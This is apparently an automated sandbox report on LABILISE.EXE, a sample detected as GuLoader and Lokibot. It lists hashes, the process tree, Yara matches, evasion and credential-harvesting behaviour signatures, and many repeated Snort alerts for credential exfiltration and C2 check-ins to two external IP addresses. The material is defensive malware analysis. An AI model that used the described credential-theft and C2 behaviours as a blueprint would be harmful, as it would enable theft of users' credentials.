Loading ...

Play interactive tourEdit tour

Analysis Report LABILISE.EXE

Overview

General Information

Sample Name:LABILISE.EXE
Analysis ID:254273
MD5:0d4cb6d7ae2a6564c3783ca0e08ef2ea
SHA1:157d220b0d0628429918a0323f9ec99054f68ea9
SHA256:70bba4913ae90f045f4be502a8ccda7910f452485dc7365648e0665262cb931e

Most interesting Screenshot:

Detection

GuLoader Lokibot
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Lokibot
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • LABILISE.EXE (PID: 6852 cmdline: 'C:\Users\user\Desktop\LABILISE.EXE' MD5: 0D4CB6D7AE2A6564C3783CA0E08EF2EA)
    • LABILISE.EXE (PID: 6888 cmdline: 'C:\Users\user\Desktop\LABILISE.EXE' MD5: 0D4CB6D7AE2A6564C3783CA0E08EF2EA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1542558864.00000000007E7000.00000004.00000020.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000001.00000002.1541507567.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
        Process Memory Space: LABILISE.EXE PID: 6852JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
          Process Memory Space: LABILISE.EXE PID: 6888JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49740 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49740 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49743 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49743 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49781 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49782 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49783 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49783 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49783 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49783 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49784 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49785 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49785 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49785 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49785 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49786 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49786 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49786 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49786 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49787 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49787 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49787 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49787 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49790 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49790 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49790 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49790 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49792 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49792 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49792 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49792 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49793 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49793 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49793 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49793 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49794 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49794 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49794 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49794 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49795 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49795 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49795 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49795 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49796 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49796 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49796 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49796 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49797 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49797 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49797 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49797 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49798 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49798 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49798 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49798 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49799 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49799 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49799 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49799 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49800 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49800 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49800 -> 172.67.187.13:80
